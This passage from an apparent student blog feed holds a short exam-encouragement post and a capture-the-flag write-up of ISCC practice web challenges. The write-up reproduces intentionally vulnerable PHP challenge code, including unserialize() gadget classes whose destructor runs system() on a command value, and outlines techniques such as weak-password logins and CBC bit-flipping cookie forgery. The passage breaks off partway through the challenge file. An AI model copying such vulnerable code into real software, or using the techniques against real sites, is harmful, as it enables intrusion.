spoofing</li><li>PHPMailer remote command execution</li><li>Referer spoofing</li><li>“Universal password” login bypass</li><li>Tomcat weak-credential upload</li><li>CMS</li><li>Weak passwords</li><li>Bash remote code execution “Shellshock” (CVE-2014-6271)</li><li>Drupal remote code execution CVE-2019-6339</li></ul><img src="https://i.loli.net/2021/09/07/NZShObwgc2L3IDX.jpg" alt="360zc" style="zoom:50%;" />]]></content>
<categories>
<category> 渗透 </category>
</categories>
</entry>
<entry>
<title>Good Luck in June</title>
<link href="/2021/05/24/ganwu/"/>
<url>/2021/05/24/ganwu/</url>
<content type="html"><![CDATA[<p>The gaokao is almost here. At the request of teachers and classmates, here are a few words of encouragement for the juniors about to head into the exam, and a reminder for my future self.</p><blockquote><p>None of us was ever ordinary; the destination never mattered much, and everything you hope to meet is already on the way. So write your confusion into poems, play it into song through all the jolts of the road, and sing it out loud under the June sun: startle the gulls behind you, sing this early-spring sky awake, sing warmth into your stubborn eyes, sing your way across every place you mean to go. May the you of September be living in the faraway place you long for today.</p></blockquote>]]></content>
<categories>
<category> 感悟 </category>
</categories>
</entry>
<entry>
<title>ISCC Practice Challenges</title>
<link href="/2021/05/07/ISCC/"/>
<url>/2021/05/07/ISCC/</url>
<content type="html"><![CDATA[<h3 id="ISCC练武题"><a href="#ISCC练武题" class="headerlink" title="ISCC练武题"></a>ISCC Practice Challenges</h3><p>Beginner-friendly challenges, good for warming up</p><h3 id="WEB-1"><a href="#WEB-1" class="headerlink" title="WEB-1"></a>WEB-1</h3><img src="https://i.loli.net/2021/05/07/ZN8dtFzLeXMafnV.png" alt="image-20210507222242720" style="zoom:67%;" /><p>Opening the environment shows a voting page</p><img src="https://i.loli.net/2021/05/07/KLXSEbzMT3PINrj.png" alt="image-20210507222313417" style="zoom:67%;" /><p>Task: within 20 seconds, make the left-hand vote count exceed the right-hand one</p><ul><li>Method 1: write a Python script that simulates clicks to stuff the vote</li><li>Method 2: modify the IDs of the left and right support agents</li><li>Method 3: edit the left-hand vote count directly in the browser console</li></ul><h3 id="WEB-2"><a href="#WEB-2" class="headerlink" title="WEB-2"></a>WEB-2</h3><p>View the source</p><img src="https://i.loli.net/2021/05/07/NytIE17VMZdvFGk.png" alt="image-20210507223605027" style="zoom:67%;" /><p>It is encoded JavaScript (JSFuck)</p><p><a href="http://www.jsfuck.com/">http://www.jsfuck.com/</a></p><p>Open the online tool and submit the encoded string directly; the flag comes out</p><blockquote><p>JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.</p><p>It does not depend on a browser, so you can even run it on Node.js.</p><p>Use the form below to convert your own script. Uncheck “eval source” to get back a plain string.</p></blockquote><h3 id="WEB-3"><a href="#WEB-3" class="headerlink" title="WEB-3"></a>WEB-3</h3><img src="https://i.loli.net/2021/05/07/ONGX2xdjBtpCzrW.png" alt="image-20210507224002677" style="zoom:67%;" /><p>Check robots.txt</p><p><img src="https://i.loli.net/2021/05/07/bYQrjdzsxecnNwT.png" alt="image-20210507224038667"></p><p>Next, look at code.txt</p><p>A block of PHP code appears</p><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><p>code.txt</p></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span> (<span class="variable">$_GET</span>[<span class="string">'password'</span>])) {</span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">preg_match</span> (<span class="string">"/^[a-zA-Z0-9]+$/"</span>, <span class="variable">$_GET</span>[<span class="string">'password'</span>]) === <span 
class="literal">FALSE</span>)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<p>You password must be alphanumeric</p>'</span>;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> (<span class="title function_ invoke__">strlen</span>(<span class="variable">$_GET</span>[<span class="string">'password'</span>]) < <span class="number">8</span> && <span class="variable">$_GET</span>[<span class="string">'password'</span>] > <span class="number">9999999</span>)</span><br><span class="line">{ </span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">strpos</span> (<span class="variable">$_GET</span>[<span class="string">'password'</span>], <span class="string">'*-*'</span>) !== <span class="literal">FALSE</span>)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">die</span>(<span class="string">'Flag: '</span> . 
<span class="variable">$flag</span>);</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">{</span><br><span class="line"><span class="keyword">echo</span>(<span class="string">'<p>*-* have not been found</p>'</span>);</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<p>Invalid password</p>'</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>Submit the password via GET according to the regular expression.</p><p>Note that the GET request is submitted at the root directory.</p><p><img src="https://i.loli.net/2021/05/07/v8HjMO1YBSuLJTp.png" alt="image-20210507224313141"></p>
<h3 id="WEB-4"><a href="#WEB-4" class="headerlink" title="WEB-4"></a>WEB-4</h3><p>Challenge description: ISCC Customer Service No. 1, Charge! (2)</p><img src="https://i.loli.net/2021/05/24/WQ9lAuUdn5hKTxR.png" alt="image-20210524115114413" style="zoom:67%;" /><p>It opens to a fake login box (actually an image)</p><p>But the image is not fully displayed</p><table><thead><tr><th align="left">Value</th><th align="left">Description</th></tr></thead><tbody><tr><td align="left">visible</td><td align="left">Default. Content is not clipped and is rendered outside the element box.</td></tr><tr><td align="left">hidden</td><td align="left">Content is clipped and the rest is invisible.</td></tr><tr><td align="left">scroll</td><td align="left">Content is clipped, but the browser shows a scrollbar so the rest can be viewed.</td></tr><tr><td align="left">auto</td><td align="left">If content is clipped, the browser shows a scrollbar so the rest can be viewed.</td></tr><tr><td align="left">inherit</td><td align="left">Specifies that the overflow value should be inherited from the parent element.</td></tr></tbody></table><p>Using the CSS layout property overflow, the full image can be revealed.</p><p>Downloading the image and trying LSB steganography extraction and hidden-archive extraction led nowhere.</p><p>POST the flag obtained from the previous challenge</p><p><img src="https://i.loli.net/2021/05/24/Et8rWxANakzXZyU.png" alt="image-20210524142323165"></p><p>Change it to admin</p><p><img src="https://i.loli.net/2021/05/24/4wajrbuW9MepE1O.png" alt="image-20210524142457440"></p><p><img src="https://i.loli.net/2021/05/24/RSx1fmegEFqhOYZ.png" alt="image-20210524142752396"></p><p>Following hints found online, inspect the cookie,</p><p>CBC bit-flipping attack</p><p><img src="https://i.loli.net/2021/05/24/7I8GA5KWmoTaRws.png" alt="image-20210524143139217"></p>
<h3 id="WEB-5"><a href="#WEB-5" class="headerlink" title="WEB-5"></a>WEB-5</h3><p>The page shows four cat pictures</p><img src="https://i.loli.net/2021/05/24/4jmfypwBbWsXEIU.png" alt="image-20210524145620439" style="zoom:50%;" /><p>According to the challenge description, this is an SSTI (server-side template injection)</p><p>The cat is called Xiaodouni</p><p>Information gathering: xiaodouni</p><img src="https://i.loli.net/2021/05/24/Qs5SJoCy2fvEzBx.png" alt="image-20210524145744276" style="zoom:67%;" /><h3 id="WEB-6"><a href="#WEB-6" class="headerlink" title="WEB-6"></a>WEB-6</h3><p>Challenge: Explore Ruby</p><h3 id="WEB-7"><a href="#WEB-7" class="headerlink" title="WEB-7"></a>WEB-7</h3><p>It opens to a login form</p><p>Neither a universal-password bypass nor SQL injection worked</p><p>Then tried a weak password: test : test</p><img src="https://i.loli.net/2021/05/07/guqNX8ATFSs7wa1.png" alt="image-20210507224844092" style="zoom:50%;" /><p>Login succeeded</p><p><img src="https://i.loli.net/2021/05/07/AP8uCZaVmjD3Glx.png" alt="image-20210507224920836"></p><p>The image URL is base64-encoded</p><p>Decoding it yields the flag</p>
<h3 id="WEB-8"><a href="#WEB-8" class="headerlink" title="WEB-8"></a>WEB-8</h3><p><img src="https://i.loli.net/2021/05/24/Yar39ABEoGC71bQ.png" alt="image-20210524154528742"></p><p>The source is as follows:</p><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">'max_execution_time'</span>, <span class="string">'5'</span>);</span><br><span class="line"><span class="title function_ invoke__">set_time_limit</span>(<span class="number">5</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$status</span> = <span class="string">"new"</span>;</span><br><span class="line"><span class="variable">$cmd</span> = <span class="string">"whoami"</span>;</span><br><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$is_unser_finished</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$iscc_file</span> = <span class="literal">NULL</span>;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ISCC_Upload</span> </span>{</span><br><span class="line"></span><br><span 
class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$cmd</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$is_upload</span>;</span><br><span class="line"> <span class="variable">$cmd</span> = <span class="string">"whoami"</span>;</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'name'</span>] = <span class="title function_ invoke__">randstr</span>(<span class="number">14</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = (<span class="title function_ invoke__">count</span>(<span class="variable">$_FILES</span>) > <span class="number">0</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$is_upload</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$status</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$iscc_file</span>;</span><br><span class="line"> <span class="variable">$status</span> = <span class="string">"upload_fail"</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$is_upload</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">foreach</span> (<span class="variable">$_FILES</span> <span class="keyword">as</span> <span class="variable">$key</span> => <span class="variable">$value</span>)</span><br><span class="line"> <span class="variable">$GLOBALS</span>[<span class="variable">$key</span>] = <span 
class="variable">$value</span>;</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">is_uploaded_file</span>(<span class="variable">$iscc_file</span>[<span class="string">'tmp_name'</span>])) {</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$check</span> = @<span class="title function_ invoke__">getimagesize</span>(<span class="variable">$iscc_file</span>[<span class="string">"tmp_name"</span>]);</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$check</span> !== <span class="literal">false</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$target_dir</span> = <span class="string">"/var/tmp/"</span>;</span><br><span class="line"> <span class="variable">$target_file</span> = <span class="variable">$target_dir</span> . <span class="title function_ invoke__">randstr</span>(<span class="number">10</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(<span class="variable">$target_file</span>)) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"想啥呢?有东西了……<br>"</span>;</span><br><span class="line"> <span class="title function_ invoke__">finalize</span>();</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$iscc_file</span>[<span class="string">"size"</span>] > <span class="number">500000</span>) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"东西塞不进去~<br>"</span>;</span><br><span class="line"> <span class="title function_ invoke__">finalize</span>();</span><br><span class="line"> <span 
class="keyword">exit</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$iscc_file</span>[<span class="string">"tmp_name"</span>], <span class="variable">$target_file</span>)) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"我拿到了!<br>"</span>;</span><br><span class="line"> <span class="variable">$iscc_file</span> = <span class="variable">$target_file</span>;</span><br><span class="line"> <span class="variable">$status</span> = <span class="string">"upload_ok"</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"拿不到:(<br>"</span>;</span><br><span class="line"> <span class="title function_ invoke__">finalize</span>();</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="title function_ invoke__">finalize</span>();</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"你真是个天才!<br>"</span>;</span><br><span class="line"> <span class="title function_ invoke__">finalize</span>();</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ISCC_ResetCMD</span> </span>{</span><br><span 
class="line"></span><br><span class="line"> <span class="keyword">protected</span> <span class="variable">$new_cmd</span> = <span class="string">"echo '新新世界,发号施令!'"</span>;</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$cmd</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$is_upload</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$status</span>;</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'name'</span>] = <span class="title function_ invoke__">randstr</span>(<span class="number">14</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable language_">$this</span>->new_cmd)) {</span><br><span class="line"> <span class="variable">$status</span> = <span class="string">"error"</span>;</span><br><span class="line"> <span class="variable">$error</span> = <span class="string">"你这罐子是空的!"</span>;</span><br><span class="line"> <span class="keyword">throw</span> <span class="keyword">new</span> <span class="built_in">Exception</span>(<span class="variable">$error</span>); </span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="title function_ invoke__">is_string</span>(<span class="variable">$this</span>->new_cmd)) {</span><br><span class="line"> <span class="variable">$status</span> = <span class="string">"error"</span>;</span><br><span class="line"> <span class="variable">$error</span> = <span 
class="string">'东西都没给对!'</span>;</span><br><span class="line"> <span class="keyword">throw</span> <span class="keyword">new</span> <span class="built_in">Exception</span>(<span class="variable">$error</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$cmd</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$status</span>;</span><br><span class="line"> <span class="variable">$status</span> = <span class="string">"reset"</span>;</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$_SESSION</span>[<span class="string">'name'</span>] === <span class="string">'isccIsCciScc1scc'</span>) {</span><br><span class="line"> <span class="variable">$cmd</span> = <span class="variable language_">$this</span>->new_cmd;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ISCC_Login</span> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="variable language_">$this</span>-><span class="title function_ invoke__">login</span>();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="variable 
language_">$this</span>-><span class="title function_ invoke__">logout</span>();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">login</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="variable">$flag</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">"/flag"</span>);</span><br><span class="line"> <span class="variable">$pAssM0rd</span> = <span class="title function_ invoke__">hash</span>(<span class="string">"sha256"</span>, <span class="variable">$flag</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$_GET</span>[<span class="string">'pAssM0rd'</span>] === <span class="variable">$pAssM0rd</span>)</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'name'</span>] = <span class="string">"isccIsCciScc1scc"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">logout</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$status</span>;</span><br><span class="line"> <span class="keyword">unset</span>(<span class="variable">$_SESSION</span>[<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$status</span> = <span class="string">"finish"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ISCC_TellMeTruth</span> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span 
class="title">__wakeup</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="string">'name'</span>])) </span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'name'</span>] = <span class="title function_ invoke__">randstr</span>(<span class="number">14</span>);</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"似乎这个 "</span>.<span class="variable">$_SESSION</span>[<span class="string">'name'</span>].<span class="string">" 是真相<br>"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"似乎这个 "</span>.<span class="variable">$_SESSION</span>[<span class="string">'name'</span>].<span class="string">" 是真相<br>"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ISCC_Command</span> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$cmd</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$is_upload</span>;</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'name'</span>] = <span class="title function_ invoke__">randstr</span>(<span class="number">14</span>);</span><br><span class="line"> <span 
class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"> <span class="variable">$cmd</span> = <span class="string">"whoami"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$cmd</span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"看看你干的好事: <span class="subst">{$cmd}</span> <br>"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$cmd</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$status</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$is_unser_finished</span>;</span><br><span class="line"> <span class="variable">$status</span> = <span class="string">"cmd"</span>;</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$is_unser_finished</span> === <span class="literal">true</span>) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"看看你干的 [<span style='color:red'><span class="subst">{$cmd}</span></span>] 弄出了什么后果: "</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<span style='color:blue'>"</span>;</span><br><span class="line"> @<span class="title function_ invoke__">system</span>(<span class="variable">$cmd</span>);</span><br><span class="line"> <span class="keyword">echo</span> <span 
class="string">"</span>"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">randstr</span>(<span class="params"><span class="variable">$len</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$characters</span> = <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_='</span>;</span><br><span class="line"> <span class="variable">$randstring</span> = <span class="string">''</span>;</span><br><span class="line"> <span class="keyword">for</span> (<span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> < <span class="variable">$len</span>; <span class="variable">$i</span>++) {</span><br><span class="line"> <span class="variable">$randstring</span> .= <span class="variable">$characters</span>[<span class="title function_ invoke__">rand</span>(<span class="number">0</span>, <span class="title function_ invoke__">strlen</span>(<span class="variable">$characters</span>))];</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$randstring</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">waf</span>(<span class="params"><span class="variable">$s</span></span>) </span>{</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">stripos</span>(<span class="variable">$s</span>, <span class="string">"*"</span>) !== <span class="literal">FALSE</span>)</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span 
class="line"> <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">finalize</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="variable">$cmd</span> = <span class="string">""</span>;</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">unset</span>(<span class="variable">$_SESSION</span>);</span><br><span class="line"> @<span class="title function_ invoke__">unlink</span>(<span class="variable">$iscc_file</span>);</span><br><span class="line"> <span class="variable">$status</span> = <span class="string">"finish"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<img src='whichisthetrueiscc.gif'><br>"</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'whatareyounongshane'</span>])) {</span><br><span class="line"> <span class="variable">$whatareyounongshane</span> = <span class="variable">$_GET</span>[<span class="string">'whatareyounongshane'</span>];</span><br><span class="line"> <span class="keyword">switch</span> (<span class="variable">$whatareyounongshane</span>) {</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"src"</span>:</span><br><span class="line"> <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"cmd"</span>:</span><br><span class="line"> <span 
class="keyword">echo</span> <span class="string">"想越级干好事?还是有门的……"</span>;</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: /?%3f=O:12:"ISCC_Command":0:{}'</span>);</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"reset"</span>:</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"几辈子积累的好运就在这时~:p"</span>;</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: /?%3f=O:13:"ISCC_ResetCMD":1:{}'</span>);</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"upload"</span>:</span><br><span class="line"> <span class="variable">$resp</span> = <span class="string"><<<EOF</span></span><br><span class="line"><span class="string"><form action="/index.php?%3f=O:11:%22ISCC_Upload%22:0:{}" method="post" enctype="multipart/form-data"></span></span><br><span class="line"><span class="string"> <input type="file" name="iscc_file"></span></span><br><span class="line"><span class="string"> <input type="submit" value="Upload Image" name="submit"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string">EOF</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="variable">$resp</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"tellmetruth"</span>:</span><br><span class="line"> <span class="keyword">echo</span> <span class="title function_ invoke__">base64_decode</span>(<span class="string">"PGltZyBzcmM9J3RlbGxtZXRydXRoLmdpZic+Cg=="</span>);</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span 
class="string">'Location: /?%3f=O:14:"ISCC_TellMeTruth":0:{}'</span>);</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"空空如也就是我!"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="title function_ invoke__">finalize</span>();</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"所以哪个ISCC是真的?<br>"</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'?'</span>])) {</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$wtf</span> = <span class="title function_ invoke__">waf</span>(<span class="variable">$_GET</span>{<span class="string">'?'</span>}) ? <span class="variable">$_GET</span>[<span class="string">'?'</span>] : (<span class="title function_ invoke__">finalize</span>() && <span class="keyword">die</span>(<span class="string">"试试就“逝世”!"</span>));</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$goodshit</span> = @<span class="title function_ invoke__">unserialize</span>(<span class="variable">$wtf</span>)) {</span><br><span class="line"> <span class="variable">$is_unser_finished</span> = <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">in_array</span>(<span class="variable">$status</span>, <span class="keyword">array</span>(<span class="string">'new'</span>, <span class="string">'cmd'</span>, <span class="string">'upload_ok'</span>, <span class="string">'upload_fail'</span>, <span class="string">'reset'</span>), <span 
class="literal">true</span>))</span><br><span class="line"> <span class="title function_ invoke__">finalize</span>();</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"所以哪个ISCC是真的?<br>"</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></span><br><span class="line"><head></span><br><span class="line"><title>ISCC finder system - which is the <span class="literal">true</span> ISCC</title></span><br><span class="line"><meta charset=<span class="string">"UTF-8"</span>></span><br><span class="line"><style></span><br><span class="line">* {</span><br><span class="line"> margin: <span class="number">0</span>;</span><br><span class="line"> padding: <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">canvas {</span><br><span class="line"> display: block;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#snowfall {</span></span><br><span class="line"> width: <span class="number">100</span>%;</span><br><span class="line"> height: <span class="number">100</span>vh;</span><br><span class="line"> background: cornflowerblue;</span><br><span class="line">}</span><br><span class="line"></style></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"></span><br><span class="line"><!--</span><br><span class="line">████████████▒▒▒▒▒▒▒▒██████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒████████████▒▒</span><br><span class="line">████████████▒▒▒▒████████████████▒▒▒▒▒▒▒▒▒▒▒▒██████████████████▒▒▒▒▒▒▒▒██████████████████</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒▒▒██▒▒▒▒▒▒▒▒▒▒████████▒▒▒▒▒▒▒▒▒▒██▒▒▒▒▒▒████████▒▒▒▒▒▒▒▒▒▒██</span><br><span 
